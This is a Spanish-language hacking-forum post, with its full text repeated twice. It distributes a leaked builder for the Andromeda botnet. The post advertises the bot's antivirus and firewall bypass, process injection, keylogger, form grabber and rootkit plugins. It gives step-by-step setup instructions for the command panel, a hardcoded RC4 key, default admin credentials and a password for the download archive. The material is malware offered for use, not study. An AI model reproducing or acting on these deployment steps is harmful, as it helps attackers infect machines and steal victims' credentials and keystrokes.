Bueno, aquí os dejo este builder para la botnet Andromeda. En mi opinión, este builder no debería haber sido público, pero The Old Warrior al final decidió publicarlo.
Para los que no conocían esta bot, ahora explicaré más o menos su contenido.
También cabe decir que de las públicas, es de las más estables, y cuando digo pública me refiero que se vende en foros ..
Citaré parte del comentario del autor (Traducido del ruso):
La comunicación entre el bot y el panel es encriptada usando RC4.
En su instalación no se necesita privilegios de administrador, ni salta UAC.
El proceso esta protegido para evitar que se pueda eliminar el bot del sistema.
Bypassea los firewalls y se inyecta en un proceso de confianza.
Si se instala correctamente, el exe se elimina automaticamente.
Funciona en sistemas desde XP a 7 incluyendo x64.
El peso del archivo es aproximadamente unos 10kb.
Bypassea muchas proactivas de los antivirus.
Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.
Aquí una imagen del builder que creó The Old Warrior.
Como se configura (En inglés pero es lo mismo que todas las bots..):
. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: [Enlace externo eliminado para invitados] and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = Install plugin
Url= [Enlace externo eliminado para invitados]
Click 'Enabled' and add your task, do the same for each plugin.
Descarga:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.
Contraseña:
TrojanForge.com
Para los que no conocían esta bot, ahora explicaré más o menos su contenido.
También cabe decir que de las públicas, es de las más estables, y cuando digo pública me refiero que se vende en foros ..
Citaré parte del comentario del autor (Traducido del ruso):
La comunicación entre el bot y el panel es encriptada usando RC4.
En su instalación no se necesita privilegios de administrador, ni salta UAC.
El proceso esta protegido para evitar que se pueda eliminar el bot del sistema.
Bypassea los firewalls y se inyecta en un proceso de confianza.
Si se instala correctamente, el exe se elimina automaticamente.
Funciona en sistemas desde XP a 7 incluyendo x64.
El peso del archivo es aproximadamente unos 10kb.
Bypassea muchas proactivas de los antivirus.
Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.
Aquí una imagen del builder que creó The Old Warrior.
Como se configura (En inglés pero es lo mismo que todas las bots..):
. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: [Enlace externo eliminado para invitados] and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = Install plugin
Url= [Enlace externo eliminado para invitados]
Click 'Enabled' and add your task, do the same for each plugin.
Descarga:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.
Contraseña:
TrojanForge.com